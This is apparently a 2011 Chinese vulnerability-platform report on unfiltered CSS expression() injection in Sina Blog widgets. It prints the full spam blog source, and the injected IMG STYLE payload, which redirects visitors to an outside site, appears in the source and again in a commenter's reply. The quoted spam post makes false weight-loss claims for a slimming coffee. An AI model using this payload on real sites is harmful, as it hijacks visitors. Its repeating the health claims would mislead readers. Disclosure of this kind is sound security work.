2011-11-28: 细节已通知厂商并且等待厂商处理中 2011-11-28: 厂商已经确认,细节仅向厂商公开 2011-12-08: 细节向核心白帽子及相关领域专家公开 2011-12-18: 细节向普通白帽子公开 2011-12-28: 细节向实习白帽子公开 2011-12-28: 细节向公众公开
QQ天天收到广告:女人必看http://blog.sina.com.cn/u/2439749250 是新浪的博客,其中插入一段代码,新浪并没有过滤,导致可以直接跳转
我们查看网页源码
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>大河源人_新浪博客</title><meta name="keywords" content="大河源人_新浪博客,大河源人,杂谈" /><meta name="description" content="大河源人_新浪博客,大河源人,甜美范练就魔鬼身材,完美转身变窈窕淑女" /><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><!–[if lte IE 6]><script type="text/javascript">try{document.execCommand("BackgroundImageCache", false, true);}catch(e){}</script><![endif]–><script type="text/javascript">window.staticTime=new Date().getTime();var locInterval = setInterval(function(){var tc = document.getElementById('trayContainer');if(tc) {var isLogin = false;var sup = document.cookie.match(/sup=([^;]+);/gi);if(sup != null){ sup = decodeURIComponent(sup[0]);var uid = sup.match(/uid=([^&]+)/gi); isLogin = (uid != null); } if (isLogin){ tc.innerHTML = '<div class="topbar_loading"><img src="http://simg.sinajs.cn/blog7style/images/common/loading.gif" />加载中…</div>'; } else { tc.innerHTML = '<div class="topbar_menu"><span class="link"><a href="http://blog.sina.com.cn" target="_blank">博客首页</a></span><span class="line_s"></span></div><div class="topbar_login"><a href="#" class="login" id="linkTrayLogin" onclick="return false;">登录</a><a href="http://login.sina.com.cn/signup/signupmail.php?entry=blog&r=&srcuid=&src=blogicp" class="register" target="_blank" id="linkReg">注册</a></div><div class="topbar_ad" id="divPopularize"></div><div id="phprender" ></div>';}clearInterval(locInterval);locInterval = null;}},50);</script><link rel="pingback" href="http://upload.move.blog.sina.com.cn/blog_rebuild/blog/xmlrpc.php" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://upload.move.blog.sina.com.cn/blog_rebuild/blog/xmlrpc.php?rsd" /><link href="http://blog.sina.com.cn/blog_rebuild/blog/wlwmanifest.xml" type="application/wlwmanifest+xml" rel="wlwmanifest" /><link rel="alternate" type="application/rss+xml" href="http://blog.sina.com.cn/rss/2439749250.xml" title="RSS" /><link href="http://simg.sinajs.cn/blog7style/css/conf/blog/index.css" type="text/css" rel="stylesheet" /><style id="tplstyle" type="text/css">@charset "utf-8";@import url("http://simg.sinajs.cn/blog7newtpl/css/30/30_1/t.css");</style><style id="positionstyle" type="text/css">.sinabloghead .blogtoparea{ left:120px;top:113.95px;}.sinabloghead .blognav{ left:120px;top:200.067px;}</style><style id="bgtyle" type="text/css"></style><style id="headtyle" type="text/css"></style><style id="navtyle" type="text/css"></style></head><body><!--$sinatopbar--><div style="z-index:512;" class="sinatopbar"> <div class="topbar_main"> <a id="login_bar_logo_link_350" href="http://blog.sina.com.cn" target="_blank"><img class="topbar_logo" src="http://simg.sinajs.cn/blog7style/images/common/topbar/topbar_logo.gif" width="100" alt="新浪博客"/></a> <div id="trayContainer" style="float:left"> </div> <div class="topbar_floatR"> <span class="tb_wrtBlog"> <a target="_blank" href="http://control.blog.sina.com.cn/admin/article/article_add.php"><img class="SG_icon SG_icon15" src="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif" width="15" height="15" title="博文" align="absmiddle"/> 发博文</a> <span id="arrowAddArticle" class="wrtblog_arrow"></span> </span> <div class="topbar_search"> <form action="" target="_blank" method="get" id="loginBarSearchForm"> <div class="topbar_input"> <input id="loginBarSearchInput" name="k" class="topbar_txt" type="text" value=""/> </div> <div id="searchSelect" class="topbar_list"> <div id="loginBarSearchMenuLabel" class="anainp">博文</div> <div class="arrow"></div> </div> <input type="submit" class="topbar_searchBtn" value="搜索"/> <input type="hidden" id="ie" value="utf-8" name="ie"/> <input type="hidden" id="loginBarSearchT" value="" name="t"/> <input type="hidden" id="loginBarSearchTS" value="" name="ts"/> <input type="hidden" id="loginBarSearchS" value="" name="s"/> <input type="hidden" id="loginBarSearchType" value="" name="type"/> <input type="hidden" id="loginBarSearchSType" value="" name="stype"/> <input type="hidden" id="e" value="utf-8" name="e"/> </form> </div> </div> </div> <div style="position:absolute;left:0;top:0;" id="trayFlashConnetion"></div> </div> <!--$end sinatopbar--><div class="sinabloga" id="sinabloga"> <div id="sinablogb" class="sinablogb"> <div id="sinablogHead" class="sinabloghead"> <div style="display: none;" id="headflash" class="headflash"></div> <div id="headarea" class="headarea"> <div id="blogTitle" class="blogtoparea"> <h1 id="blogname" class="blogtitle"><a href="http://blog.sina.com.cn/u/2439749250"><span id="blognamespan">大河源人的博客</span></a></h1> <div id="bloglink" class="bloglink"><a href="http://blog.sina.com.cn/u/2439749250">http://blog.sina.com.cn/u/2439749250</a> <a onclick="return false;" class="CP_a_fuc" href="#" id="SubscribeNewRss">[<cite>订阅</cite>]</a><a class="CP_a_fuc" href="javascript:void(scope.pa_add.add('2439749250'));">[<cite>手机订阅</cite>]</a></div> </div> <div class="blognav" id="blognav"> <div id="blognavBg" class="blognavBg"></div> <div class="blognavInfo"> <span><a class="on" href="http://blog.sina.com.cn/u/2439749250">首页</a></span> <span><a href="http://blog.sina.com.cn/s/articlelist_2439749250_0_1.html">博文目录</a></span> <span><a href="http://photo.blog.sina.com.cn/u/2439749250">图片</a></span> <span class="last"><a href="http://blog.sina.com.cn/s/profile_2439749250.html">关于我</a></span></div> </div> <div class="autoskin" id="auto_skin"> </div><div class="adsarea"> <a href="#"><div id="template_clone_pic" class="pic"></div></a> <div id="template_clone_link" class="link wdc_HInf"></div> <div id="template_clone_other" class="other"></div> </div> </div> </div> <!--主题内容开始 --> <div class="sinablogbody" id="sinablogbody"> <!--第一列start--> <div id="column_1" class="SG_colW21 SG_colFirst"><div class="SG_conn" id="module_1001"> <div class="SG_connHead"> <span class="title" comp_title="请输入标题">请输入标题</span> <span class="edit"> </span> </div> <div class="SG_connBody"> <div class="diywidget"><DIV CLASS="SG_connBody"><DIV CLASS="diywidget"><IMG STYLE="x:expression(if(window.r!=1){window.r=1; window.location.href=" http://www.zzpbz.com"})" /></DIV></DIV></div> </div> <div class="SG_connFoot"></div> </div><div class="SG_conn" id="module_901"> <div class="SG_connHead"> <span class="title" comp_title="个人资料">个人资料</span> <span class="edit"> </span> </div> <div class="SG_connBody"> <div class="info"> <div class="info_img" id="comp_901_head"><img src="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif" real_src ="http://portrait3.sinaimg.cn/2439749250/blog/180" id="comp_901_head_image" width="180" height="180" alt="大河源人" title="大河源人" /></div> <div class="info_txt"> <div class="info_nm"> <img id="comp_901_online_icon" style="display:none;" class="SG_icon SG_icon1" src="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif" width="15" height="15" align="absmiddle" /> <span class="SG_txtb"><strong id="ownernick">大河源人</strong></span> <div class="clearit"></div> </div> <div class="info_btn1"> <!--user['qing_url'] --> <a target="_blank" href="http://qing.weibo.com/discovery.html" onclick="v7sendLog && v7sendLog('79_01_01',scope.$pageid,'qingLink');" class="SG_aBtn SG_aBtn_ico"><cite><img class="SG_icon SG_icon205" src="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif" width="15" height="15" align="absmiddle" />Qing</cite></a> <a target="_blank" href="http://weibo.com/2439749250?source=blog" class="SG_aBtn SG_aBtn_ico"><cite><img class="SG_icon SG_icon51" src="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif" width="15" height="15" align="absmiddle" />微博</cite></a> <div class="clearit"></div> </div> <div class="SG_j_linedot"></div> <div class="info_locate" id = "info_locate_id"><div class="SG_j_linedot"></div><div class="info_btn2"> <p> <a href="javascript:void(0);" class="SG_aBtn " id="comp901_btn_invite"><cite >加好友</cite></a> <a href="javascript:void(0);" class="SG_aBtn" id="comp901_btn_sendpaper"><cite >发纸条</cite></a> </p> <p> <a href="http://blog.sina.com.cn/s/profile_2439749250.html#write" class="SG_aBtn" id="comp901_btn_msninfo"><cite>写留言</cite></a> <a href="#" onclick="return false;" class="SG_aBtn" id="comp901_btn_follow"><cite onclick="Module.SeeState.add()">加关注</cite></a> </p> <div class="clearit"></div></div><div class="SG_j_linedot"></div></div> <div class="info_list"> <ul class="info_list1"> <li><span class="SG_txtc">博客等级:</span><span id="comp_901_grade"><img src="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif" real_src="http://simg.sinajs.cn/blog7style/images/common/number/1.gif" /><img src="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif" real_src="http://simg.sinajs.cn/blog7style/images/common/number/2.gif" /></span></li> <li><span class="SG_txtc">博客积分:</span><span id="comp_901_score"><strong>3</strong></span></li> </ul> <ul class="info_list2"> <li><span class="SG_txtc">博客访问:</span><span id="comp_901_pv"><strong>19,776</strong></span></li> <li><span class="SG_txtc">关注人气:</span><span id="comp_901_attention"><strong>2</strong></span></li> </ul> </div><div class="clearit"></div> </div> <div class="clearit"></div></div> </div> <div class="SG_connFoot"></div></div><div class="SG_conn" id="module_12"> <div class="SG_connHead"> <span class="title" comp_title="访客">访客</span> <span class="edit"> </span> </div> <div class="SG_connBody"> <div class="wdtLoading"><img src="http://simg.sinajs.cn/blog7style/images/common/loading.gif" />加载中…</div> </div> <div class="SG_connFoot"></div> </div><div class="SG_conn" id="module_17"> <div class="SG_connHead"> <span class="title" comp_title="好友">好友</span> <span class="edit"> </span> </div> <div class="SG_connBody"> <div class="wdtLoading"><img src="http://simg.sinajs.cn/blog7style/images/common/loading.gif" />加载中…</div> </div> <div class="SG_connFoot"></div> </div><div class="SG_conn" id="module_1"> <div class="SG_connHead"> <span class="title" comp_title="评论">评论</span> <span class="edit"> </span> </div> <div class="SG_connBody"> <div class="wdtLoading"><img src="http://simg.sinajs.cn/blog7style/images/common/loading.gif" />加载中…</div> </div> <div class="SG_connFoot"></div> </div><div class="SG_conn" id="module_2"> <div class="SG_connHead"> <span class="title" comp_title="留言">留言</span> <span class="edit"> </span> </div> <div class="SG_connBody"> <div class="wdtLoading"><img src="http://simg.sinajs.cn/blog7style/images/common/loading.gif" />加载中…</div> </div> <div class="SG_connFoot"></div> </div><div id="module_3" class="SG_conn"> <div class="SG_connHead"> <span comp_title="分类" class="title">分类</span> <span class="edit"> </span> </div> <div class="SG_connBody"> <div class="classList"> <ul> <li class="SG_dot"><a target="_blank" href="http://blog.sina.com.cn/s/articlelist_2439749250_0_1.html">全部博文</a><em class="count SG_txtb">(1)</em></li> </ul> </div> </div> <div class="SG_connFoot"></div></div></div> <!--第一列end--> <!--第二列start--> <div id="column_2" class="SG_colW73"><div id="module_10001" class="SG_conn"> <div class="SG_connHead"> <span comp_title="博文" class="title">博文</span> <span class="edit"> </span> </div> <div class="SG_connBody"> <div class="bloglist"> <div class="blog_title_h"> <span class="img1"></span> <div id="t_10001_916b9e820100yay9" class="blog_title"> <a href="http://blog.sina.com.cn/s/blog_916b9e820100yay9.html" target="_blank">甜美范练就魔鬼身材,完美转身变窈窕淑女</a> </div> <img height="15" width="15" align="absmiddle" title="此博文包含图片" src="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif" class="SG_icon SG_icon18"/> <span class="time SG_txtc">(2011-10-03 11:48)</span> </div> <div class="articalTag"> <table> <tr> <td class="blog_tag"> <span class="SG_txtb">标签:</span> <h3><a href="http://uni.sina.com.cn/c.php?t=blog&k=%D4%D3%CC%B8&ts=bpost&stype=tag" target="_blank">杂谈</a></h3> </td> <td class="blog_class"> </td> </tr> </table> </div> <div class="content"> <div><div><div><font SIZE="4">开扒之前先自我介绍下吧:</FONT><p><font SIZE="4"> 小女今年28岁,165cm的身高,不是很差的长相,可至今还是单身很愁人。相亲的次数比我年纪还大,每次都是以失败而告终,至今仍无人问津!不是我挑剔,实在是人家瞧不上我啊,怪谁呢,只能怪自己的身材,谁叫我有事没事就知道吃吃吃,一吃就吃到了130J,倒霉催的~~~所以当初减M肥的动机也很简单,就想在30岁之前把自己推销出去!如果再不减M肥自己都不好意思再出现在朋友们的面前了</FONT><font SIZE="4"> 我从小就是个胖妞,全身肉鼓鼓的,漂亮的衣服从来与我无缘。从大学起就一直在跟身上的肉肉做斗争,还想了个口号鼓励自己:“不瘦绝不停止”。<br /></FONT></P><p ALIGN="center"><a HREF="http://photo.blog.sina.com.cn/showpic.html#blogid=832be4280100sbp5&url=http://s3.sinaimg.cn/orignal/832be428ga714e0ea5852" TARGET="_blank"><img src="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif" real_src ="http://s3.sinaimg.cn/middle/832be428ga714e0ea5852&690" NAME="image_operate_77361309608074093" ALT="" TITLE="" HEIGHT="375" WIDTH="285" /></A></P><p><font SIZE="4"> 身上全是厚厚的脂s肪</FONT></P><p><font SIZE="4"> 刚开始,减M肥都是乱来的,人家说什么有效就去试什么。吃减M肥药啊、运动啊、节食啊,折腾老久了,效果根本不明显,尤其是吃减M肥药除了反弹外还有副作用,腹泻、心慌无力,现在想想都后怕。后来我又选择了比较健康的减M肥食谱,并给自己制定了减M肥计划。</FONT></P><div><p ALIGN="center"><br /><a HREF="http://photo.blog.sina.com.cn/showpic.html#blogid=832be4280100sbp5&url=http://s14.sinaimg.cn/orignal/832be428ga714e33d425d" TARGET="_blank"><img src="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif" real_src ="http://s14.sinaimg.cn/middle/832be428ga714e33d425d&690" NAME="image_operate_75971309608097204" ALT="" TITLE="" HEIGHT="296" WIDTH="400" /></A><br /><br /><br /><br /><br /><br /><br /><font SIZE="4">薏米粥喝得我打票</FONT></P></DIV><p><font SIZE="4"> 首先是早餐,早餐是一定要吃的,薏米粥(利尿,排毒,虽然不怎么好喝),水煮蔬菜,一个水煮鸡蛋,善存维生素片,十点左右饿了就喝牛奶(我都是喝舒化奶低脂低乳糖),其次是午餐:一小小碗米饭或白粥,蔬菜,豆腐这些清淡膳食,饭后一小时喝茶,下午肚子饿了就吃个水果;最后是晚餐:薏米粥,水煮蔬菜。这样减M肥虽然健康,但效果太慢也是白搭,偶尔不注意,体s重又蹭蹭蹭地往上涨</FONT><font SIZE="4"> 有了失败的经验,再总结失败的减M肥经验之后,我又找到了一款</FONT><font SIZE="4">,它含有的高速左`旋`肉`碱由母乳中提取的高品质维生素,在婴儿奶粉中都有添加,健康安全,评论说很多女性网站看到很多网友也都在推荐它,风评非常好,我就特意上了左旋360咖啡的官网上看看。</FONT></P><p><font SIZE="4"> </FONT><font SIZE="4">原理是顶级黄金配比的高速左~旋~肉~碱和黑咖啡共同作用,通过吸收匆匆进了血液和淋巴循环,从而放慢人体的新陈代谢。排出多余脂肪,减少脂肪沉积,从源头上杜绝肥胖,健康减`肥,对人体没有任何副作用。</FONT></P><p STYLE="text-align: center;"><font SIZE="4"> </FONT><br /><br /><font SIZE="4"> </FONT><a HREF="http://photo.blog.sina.com.cn/showpic.html#blogid=832be4280100sbp5&url=http://s14.sinaimg.cn/orignal/832be428ga714e63e08bd" TARGET="_blank"><img src="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif" real_src ="http://s14.sinaimg.cn/middle/832be428ga714e63e08bd&690" NAME="image_operate_32261309608085988" ALT="" TITLE="" HEIGHT="358" WIDTH="275" /></A><br /><br /><font SIZE="4"> </FONT></P><p ALIGN="center"><br /><font SIZE="4">似乎减M肥效果出现了</FONT></P><p><font SIZE="4"> 使用第二个疗程效果最为明显,像</FONT><font SIZE="4">说的那样,喝过左旋360减肥咖啡后脂肪得到自然的分解和消耗,并建立一个新的吸收和消耗热量的体内平衡机制,在体重减轻的同时,身体是处于一个平衡状态,将脂肪排出体外,达到巩固塑身的效果,不会出现反弹现象,减M肥、排毒一并解决!使用到了第二个疗程身体也没出现啥问题。</FONT></P><p ALIGN="center"><a HREF="http://photo.blog.sina.com.cn/showpic.html#blogid=832be4280100sbp5&url=http://s6.sinaimg.cn/orignal/832be428ga714e3f496f5" TARGET="_blank"><img src="http://simg.sinajs.cn/blog7style/images/common/sg_trans.gif" real_src ="http://s6.sinaimg.cn/middle/832be428ga714e3f496f5&690" NAME="image_operate_37891309608071326" ALT="" TITLE="" HEIGHT="356" WIDTH="273" /></A></P><p ALIGN="center"><br /><font SIZE="4">哈哈,大晒我瘦`身后的照片</FONT></P><p ALIGN="center"><font SIZE="4">[360咖啡正品购买地址:</FONT><a HREF="http://www.jiank8.com/?qqfriend10" TARGET="_blank">http://www.jiank8.com</A> <font SIZE="4">)</FONT></P><p><font SIZE="4"> 第二个疗程后就进入了巩固期,体内多余油脂与毒素排出来,全身变轻松。走路或跑步时感觉到整个人轻盈了好多。加上我平时健康的饮食习惯,多喝水,周身的赘肉不见耶~,终于可以穿上短裤出来秀秀了。</FONT></P><p><font SIZE="4"> 肥胖没什么可怕的,只要找对方法,赘肉让它们哪来哪去。建议MM们使用科学健康的减M肥方法,例如我的方法可以借鉴,安全有效减`重保持形体,直接加入我们的瘦`身一族吧。</FONT></P><p ALIGN="center"><font SIZE="4">[360咖啡正品购买地址:</FONT><a HREF="http://www.jiank8.com/?qqfriend10" TARGET="_blank">http://www.jiank8.com</A> <font SIZE="4">)</FONT></P></DIV></DIV></DIV> </div> <div class="tagMore"> <div class="tag SG_txtc"> <a id="r_10001_916b9e820100yay9" href="http://blog.sina.com.cn/s/blog_916b9e820100yay9.html" target="_blank">阅读</a> ┆ <a target="_blank" href="http://blog.sina.com.cn/s/blog_916b9e820100yay9.html#comment" id="c_10001_916b9e820100yay9">评论</a> ┆ <span class="SG_txtc">禁止转载</span> ┆ <a id="f_10001_916b9e820100yay9" href="javascript:;" onclick="return false;">收藏</a> </div> </div> <div style="display: none;" class="blogzz_zzlist borderc" id="ff_916b9e820100yay9"></div> <div class="SG_j_linedot"></div> <div favmd5='{"916b9e820100yay9":"931d591012f2be586478cdb77a7aa3f4"}' classid="0" pagesize="10" total="1" id="pagination_10001" class="SG_page"></div> </div> </div> <div class="SG_connFoot"></div></div></div> <!--第二列start--> <!--第三列start--> <div id="column_3" class="SG_colWnone"><div style="width:0px;height:0.1px;margin:0px;"> </div></div> <!--第三列end--> </div> <!--主题内容结束 --> <div id="diggerFla" style="position:absolute;left:0px;top:0px;width:0px"></div> <div class="sinablogfooter" id="sinablogfooter" style="position:relative;"> <p class="SG_linka"><a href="http://control.blog.sina.com.cn/admin/advice/advice_list.php" target="_blank">新浪BLOG意见反馈留言板</a> <a href="javascript:;" onclick="window.open ('http://control.blog.sina.com.cn/admin/advice/impeach.php?url=http%3A//blog.sina.com.cn/s/blog_4cf7b4ec0100eudp.html%3Ftj%3D1', '','height=495, width=510, top=0, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=n o, status=no');">不良信息反馈</a> 电话:4006900000 提示音后按1键(按当地市话标准计费) 欢迎批评指正</p> <p class="SG_linka"><a href="http://corp.sina.com.cn/chn/" target="_blank">新浪简介</a> | <a href="http://corp.sina.com.cn/eng/" target="_blank">About Sina</a> | <a href="http://emarketing.sina.com.cn/" target="_blank">广告服务</a> | <a href="http://www.sina.com.cn/contactus.html" target="_blank">联系我们</a> | <a href="http://corp.sina.com.cn/chn/sina_job.html" target="_blank">招聘信息</a> | <a href="http://www.sina.com.cn/intro/lawfirm.shtml" target="_blank">网站律师</a> | <a href="http://english.sina.com" target="_blank">SINA English</a> | <a href="http://members.sina.com.cn/apply/" target="_blank">会员注册</a> | <a href="http://help.sina.com.cn/" target="_blank">产品答疑</a> </p> <p class="copyright SG_linka"> Copyright © 1996 - 2011 SINA Corporation, All Rights Reserved</p> <p class="SG_linka"> 新浪公司 <a href="http://www.sina.com.cn/intro/copyright.shtml" target="_blank">版权所有</a></p> <a href="http://www.bj.cyberpolice.cn/index.jsp" target="_blank" class="gab_link"></a> </div> </div></div><div id="swfbox"></div><script id="PVCOUNTER_FORIE" type="text/javascript"></script></body><script type="text/javascript">var scope = { $setDomain : true, $uid : "2439749250", $PRODUCT_NAME : "blog7", //blog7photo,blog7icp $pageid : "index", $key : "706f8615422e537794143a741bf119f6", $uhost : "", $private: {"pageset":0,"tj":0,"adver":0,"sms":0,"ad":0,"blogsize":0,"cms":0,"hidecms":0,"top":0,"invitationset":0,"p4p":0,"spamcms":0,"init7":0,"quote":0,"foot":0,"isprivate":0,"headpic":0,"t_sina":0}, $playids :"", $babylevel:"", $channel:0, $is_photo_vip:0, $nClass:0, $isLevelUp:0, component_lists:{"2":{"size":730,"list":[10001]},"1":{"size":210,"list":[1001,901,12,17,1,2,3]}}, formatInfo:1, UserPic:[{"pid":"","repeat":"repeat-x","align-h":"center","align-v":"top","apply":""},{"pid":"","repeat":"repeat-x","align-h":"center","align-v":"top","apply":""},{"pid":"","repeat":"repeat-x","align-h":"center","align-v":"top","apply":""}], UserBabyPic:{"photoX":null,"photoY":null,"photoURL":null,"angle":null,"zoom":null,"maskX":null,"maskY":null,"maskURL":null,"frameURL":null}, UserColor:1, backgroundcolor:"rgb(188, 211, 229)", tpl:"30_1"};var $encrypt_code = "17a213c4911364dc507761db8adb58ec";</script><script type="text/javascript" src="http://sjs.sinajs.cn/blog7common/js/boot.js"></script><script type="text/javascript">__load_js();</script><script type="text/javascript">__render_page();</script><!-- ALL CODE START--><!-- SUDA_CODE_START --> <noScript> <div style='position:absolute;top:0;left:0;width:0;height: 0;visibility:hidden'><img width=0 height=0 src='http://beacon.sina.com.cn/a.gif?noScript' border='0' alt='' /></div> </noScript> <!-- SUDA_CODE_END --> <!-- START WRating v1.0 --><script type="text/javascript" src="http://sina.wrating.com/a1.js"></script><script type="text/javascript">try{var vjAcc="860010-0328010000";var wrUrl="http://sina.wrating.com/";vjTrack("");}catch(e){};</script><noscript><img src="http://sina.wrating.com/a.gif?a=&c=860010-0328010000" width="1" height="1" style="display: none;"/></noscript><!-- END WRating v1.0 --><!-- START Nielsen//NetRatings SiteCensus V5.2 --><!-- COPYRIGHT 2006 Nielsen//NetRatings --><script type="text/javascript"> var _rsCI="cn-sina2006"; var _rsCG="0"; var _rsDN="//secure-cn.imrworldwide.com/"; var _rsCC=0; var _rsSE=1; var _rsSM=0.01; var _rsSS=1500;</script><script type="text/javascript" src="//secure-cn.imrworldwide.com/v52.js"></script><noscript><img src="//secure-cn.imrworldwide.com/cgi-bin/m?ci=cn-sina2006&cg=0" alt=""/> </noscript><!-- END Nielsen//NetRatings SiteCensus V5.2 --></html>
其中导致直接跳转的部分为:
</div> <div class="SG_connBody"> <div class="diywidget"><DIV CLASS="SG_connBody"><DIV CLASS="diywidget"><IMG STYLE="x:expression(if(window.r!=1){window.r=1; window.location.href=" http://www.zzpbz.com"})" /></DIV></DIV></div> </div> <div class="SG_connFoot"></div> </div>
这个你们擅长的,过滤字符
危害等级:低
漏洞Rank:5
确认时间:2011-11-28 21:20
感谢提供,我们马上修复
暂无
有图有真相
<IMG STYLE="x:expression(if(window.r!=1){window.r=1; window.location.href=" http://www.Php0day.com"})" />
@xsser 我rank值不对了?一百多成了六十多。。。请给缘由。
( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)